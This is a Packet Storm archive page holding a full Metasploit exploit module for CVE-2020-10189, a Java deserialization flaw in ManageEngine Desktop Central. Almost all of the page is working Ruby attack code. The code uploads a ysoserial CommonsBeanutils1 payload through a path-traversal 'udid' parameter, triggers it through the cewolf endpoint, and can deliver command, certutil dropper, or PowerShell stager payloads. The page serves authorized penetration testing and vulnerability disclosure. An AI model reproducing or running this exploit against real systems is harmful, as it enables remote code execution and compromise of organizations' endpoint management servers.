what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine Desktop Central Java Deserialization

ManageEngine Desktop Central Java Deserialization
Posted Mar 14, 2020
Authored by mr_me, wvu | Site metasploit.com

This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.

tags | exploit, java
advisories | CVE-2020-10189
SHA-256 | 1b4d937c85f3beaac187c7d1a0baa59b7627812c7cd91b156f52ad23a8958285

ManageEngine Desktop Central Java Deserialization

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central Java Deserialization',
'Description' => %q{
This module exploits a Java deserialization vulnerability in the
getChartImage() method from the FileStorage class within ManageEngine
Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.

"The short-term fix for the arbitrary file upload vulnerability was
released in build 10.0.474 on January 20, 2020. In continuation of that,
the complete fix for the remote code execution vulnerability is now
available in build 10.0.479."
},
'Author' => [
'mr_me', # Discovery and exploit
'wvu' # Module
],
'References' => [
['CVE', '2020-10189'],
['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
],
'DisclosureDate' => '2020-03-05', # 0day release
'License' => MSF_LICENSE,
'Platform' => 'windows',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Windows Command',
'Arch' => ARCH_CMD,
'Type' => :win_cmd
],
['Windows Dropper',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper
],
['PowerShell Stager',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'RPORT' => 8383,
'SSL' => true,
'WfsDelay' => 60 # It can take a little while to trigger
},
'CmdStagerFlavor' => 'certutil', # This works without issue
'Notes' => {
'PatchedVersion' => Gem::Version.new('100474'),
'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?
'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'configurations.do')
)

unless res
return CheckCode::Unknown('Target is not responding to check')
end

unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')
return CheckCode::Unknown('Target is not running Desktop Central')
end

version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text

unless version
return CheckCode::Detected('Could not detect Desktop Central version')
end

vprint_status("Detected Desktop Central version #{version}")

if Gem::Version.new(version) < notes['PatchedVersion']
return CheckCode::Appears("#{version} is an exploitable version")
end

CheckCode::Safe("#{version} is not an exploitable version")
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end

def execute_command(cmd, _opts = {})
# XXX: An executable is required to run arbitrary commands
cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper

vprint_status("Serializing command: #{cmd}")

# I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(
'CommonsBeanutils1',
cmd
)

# XXX: Patch in expected serialVersionUID
serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"

# Rock 'n' roll!
upload_serialized_payload(serialized_payload)
deserialize_payload
end

def upload_serialized_payload(serialized_payload)
print_status('Uploading serialized payload')

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/mdm/client/v1/mdmLogUploader'),
'ctype' => 'application/octet-stream',
'vars_get' => {
'udid' => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
'filename' => 'logger.zip'
},
'data' => serialized_payload
)

unless res && res.code == 200
fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')
end

print_good('Successfully uploaded serialized payload')

# C:\Program Files\DesktopCentral_Server\bin
register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
end

def deserialize_payload
print_status('Deserializing payload')

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'cewolf/'),
'vars_get' => {'img' => '\\logger.zip'}
)

unless res && res.code == 200
fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')
end

print_good('Successfully deserialized payload')
end

end
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close